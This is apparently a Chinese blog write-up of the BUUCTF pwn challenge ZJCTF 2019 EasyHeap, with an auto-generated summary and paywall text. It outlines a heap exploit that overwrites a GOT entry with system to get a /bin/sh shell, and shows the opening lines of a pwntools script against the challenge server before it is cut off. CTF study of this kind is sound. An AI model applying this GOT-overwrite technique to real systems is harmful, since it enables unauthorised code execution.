[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
思路
我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果,
但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用堆漏洞就可以达到其目的。
exploit
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p = remote("node4.buuoj.cn",28081)
elf = ELF('easyheap')
p.sendafter('Your choice :',b'1\n')
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')
p.sendafter('Your choice :'<

这篇博客介绍了一个CTF挑战的解决方案,主要涉及堆溢出漏洞利用。作者通过操纵函数的 GOT 表,将 `system` 函数指针指向 `/bin/sh`,最终实现执行 shell 的目标。利用过程包括了多次内存分配、释放和修改堆块,以达到控制程序执行流的目的。
最低0.47元/天 解锁文章
2990

被折叠的 条评论
为什么被折叠?



